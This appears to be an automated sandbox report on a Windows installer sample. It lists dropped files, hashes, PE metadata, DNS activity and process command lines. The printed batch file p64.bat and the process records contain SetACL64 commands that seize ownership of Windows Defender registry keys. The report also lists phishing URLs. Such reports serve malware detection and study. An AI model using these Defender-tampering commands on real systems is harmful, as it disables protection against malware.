Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://form.jotform.com/241928414558060?email=achim@hdasan.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://inodive.us/css/ZC5zYXV0aWVyQHNibS5tYw==	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://119-18-34-76.771222.bne.static.aussiebb.net	Get hash	malicious	Unknown	Browse	192.229.221.95
	V-Mail_maryland.gov.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	192.229.221.95
	https://www.searchvity.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://mail.pfl.fyi/v1/messages/01909fdd-253c-74e4-a4d4-2d3080c42178/click?link_id=01909fdd-2577-78fa-9aa1-1363f665f21c&signature=ec89d906ae45cddf78ff2ac5ff90a7b4fb4098de	Get hash	malicious	Unknown	Browse	192.229.221.95
	Purchase Order.exe	Get hash	malicious	AgentTesla	Browse	192.229.221.95
	https://zzmc.tatateri.com/lPY0TK6A/#Mandrew.lapkin@innocap.com	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	192.229.221.95
	http://bitcoindogsclub-65w.pages.dev/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://att-108408-101682.weeblysite.com/	Get hash	malicious	Unknown	Browse	192.229.221.95

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	file.exe	Get hash	malicious	Unknown	Browse
	Ptmhbplhxb.exe	Get hash	malicious	Unknown	Browse
	P196hUN2fw.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe	Ptmhbplhxb.exe	Get hash	malicious	Unknown	Browse
	P196hUN2fw.exe	Get hash	malicious	Unknown	Browse
	e4.exe	Get hash	malicious	RedLine	Browse
	2dOeahdsto.exe	Get hash	malicious	Xmrig	Browse
	bQQHP9ciRL.exe	Get hash	malicious	Xmrig	Browse
	DllHost.exe	Get hash	malicious	Xmrig	Browse
	Fza7TPh6Z7.exe	Get hash	malicious	Unknown	Browse
	SAlxtNmHFR.exe	Get hash	malicious	RedLine Xmrig	Browse
	BFSdrqaAvS.exe	Get hash	malicious	Amadey RedLine	Browse
	We7WnoqeXe.exe	Get hash	malicious	Amadey RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	945944
Entropy (8bit):	6.654096172451499
Encrypted:	false
SSDEEP:	24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
MD5:	EFE5769E37BA37CF4607CB9918639932
SHA1:	F24CA204AF2237A714E8B41D54043DA7BBE5393B
SHA-256:	5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
SHA-512:	33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21% Antivirus: Virustotal, Detection: 19%, Browse
Joe Sandbox View:	Filename: Ptmhbplhxb.exe, Detection: malicious, Browse Filename: P196hUN2fw.exe, Detection: malicious, Browse Filename: e4.exe, Detection: malicious, Browse Filename: 2dOeahdsto.exe, Detection: malicious, Browse Filename: bQQHP9ciRL.exe, Detection: malicious, Browse Filename: DllHost.exe, Detection: malicious, Browse Filename: Fza7TPh6Z7.exe, Detection: malicious, Browse Filename: SAlxtNmHFR.exe, Detection: malicious, Browse Filename: BFSdrqaAvS.exe, Detection: malicious, Browse Filename: We7WnoqeXe.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......\|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	616312
Entropy (8bit):	6.302197712270286
Encrypted:	false
SSDEEP:	12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
MD5:	1FB64FF73938F4A04E97E5E7BF3D618C
SHA1:	AA0F7DB484D0C580533DEC0E9964A59588C3632B
SHA-256:	4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
SHA-512:	DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: Ptmhbplhxb.exe, Detection: malicious, Browse Filename: P196hUN2fw.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	3.8201777744499874
Encrypted:	false
SSDEEP:	48:6isDgDtjQHbc6akyAnx2mMM4ife1QivkZZtMlDIra569FHpfbNtm:X1JQpjVfeT1+fzNt
MD5:	6B1213639BC5FFC4F1AF8C17420D4B1F
SHA1:	EE2D622099FB19A8ED7E1C6137F60AC86FA65486
SHA-256:	1FA9E2264B4954F01A83F6A4E8BC7982516091E0FB0C6A2F6154FA87164148B7
SHA-512:	03A81297F140B0428636452075C1465D895485268BA243B03562495A5FF46CD392EF8D1A13D0C738D2CF3B560D0EF73AFCC63F210B3BDBF4D931E2E204CF4498
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 5%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..e.........."...0..............'... ...@....@.. ....................................@..................................'..O....@.......................`......X&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H........ ...............................................................0..$.......s............o.......,..o.......&...................... ........(....BSJB............v2.0.50727......l.......#~..P...h...#Strings............#US.........#GUID...........#Blob...........G..........3....................................................................d.....8.......................k.....7.....P...........x.....V...........L.....^.S...5.......................'.=.....P ..........

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exe.config

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	281
Entropy (8bit):	5.066733139951878
Encrypted:	false
SSDEEP:	6:TMVBd1IGMfVymRMT4/0xFCqa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVymhs8rzcrfyW3xm
MD5:	4E15196F1F466FB6200550D7F678BB9D
SHA1:	F474593BCC3148464D6DE0E0D3DF58C76A9718AB
SHA-256:	5C3A338369C8B23A7021732FB167AB0FCB3C4BE9B6EEC7A726C8D9875890CCC1
SHA-512:	6B3E8C65D3ECCC1DBF32C957CDC0AB05E85680603ED43587194E93B4117292290085A14D1711872B1C6277159E50E409EEFDA813A13FC314A63BEC6DE2D95E43
Malicious:	true
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true"> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	12767
Entropy (8bit):	5.189808508831073
Encrypted:	false
SSDEEP:	192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK
MD5:	1ABF8067994181B1A38867BF6437F9D2
SHA1:	D25E23848F65B85F0F21E9A0A69E4268B625ECA2
SHA-256:	23BBB732FF55AB62DC8863A69626EF5655F60BF0D7B96FA2818A895E81283B40
SHA-512:	6237826DE2FEAF63C2F1312680118474F9B60F5516A05E171743A09A088D7C9BFD06CE9DE17852E6F4C2DCB577814163621FF27B2A7BBB37F2A1AE130F64D882
Malicious:	false
Preview:	@echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exe

Download File

Process:	C:\Users\user\Desktop\3Dut8dFCwD.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.655569464152001
Encrypted:	false
SSDEEP:	96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
MD5:	7CB364701028767F8942CC3F8439F8F2
SHA1:	D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
SHA-256:	A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
SHA-512:	3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(......(.......0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.........0............(....,..{.............(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.975794911633562
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3Dut8dFCwD.exe
File size:	898'420 bytes
MD5:	3f58da2e1652dddab53995166f24993f
SHA1:	1721c19909c2309398d5174f9fcb2abcff51e862
SHA256:	d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
SHA512:	ece1950851e0724f465471cfd50021f0c13642f66753c56bb77c91e6db972032ce272286f2d51f5c87edb61b806cd8a21458286f8bd1b799821526966b10dca1
SSDEEP:	24576:MGxOacf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90ef2:XxyCoZz943+YaJNFtM+5wL3AP912
TLSH:	8B1523FEA3C9DC67D1E312700A5906750BD26E166D94883AE3933CC8B777742AB6D306
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L...Y..d.................h....:....

File Icon


Icon Hash:	202c38303420a0cd

Static PE Info

General

Entrypoint:	0x40350f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC59 [Sun Jul 2 02:09:29 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FCC7CD1A38Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FCC7CD1A358h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8318h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e0000	0x42a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66b1	0x6800	fc80ef3332ba3a0dd802b98a9723e67d	False	0.6719501201923077	data	6.466881320096335	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e378	0x600	89ffa2c22129e298ad6a3abf19eb19b0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x37000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3e0000	0x42a8	0x4400	8fd15985020fbabc749233d6fb67da82	False	0.3312844669117647	data	5.175218885302942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3e01f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.3017634854771784
RT_ICON	0x3e2798	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.3651500938086304
RT_ICON	0x3e3840	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.5336879432624113
RT_DIALOG	0x3e3ca8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3e3da8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3e3ec8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3e3f28	0x30	data	English	United States	0.8333333333333334
RT_MANIFEST	0x3e3f58	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5517241379310345

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 12, 2024 09:53:10.969609976 CEST	1.1.1.1	192.168.2.5	0xeacd	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 12, 2024 09:53:10.969609976 CEST	1.1.1.1	192.168.2.5	0xeacd	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:52:52
Start date:	12/07/2024
Path:	C:\Users\user\Desktop\3Dut8dFCwD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3Dut8dFCwD.exe"
Imagebase:	0x400000
File size:	898'420 bytes
MD5 hash:	3F58DA2E1652DDDAB53995166F24993F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:52:53
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:52:53
Start date:	12/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:52:53
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:52:54
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:52:54
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:52:54
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:52:54
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
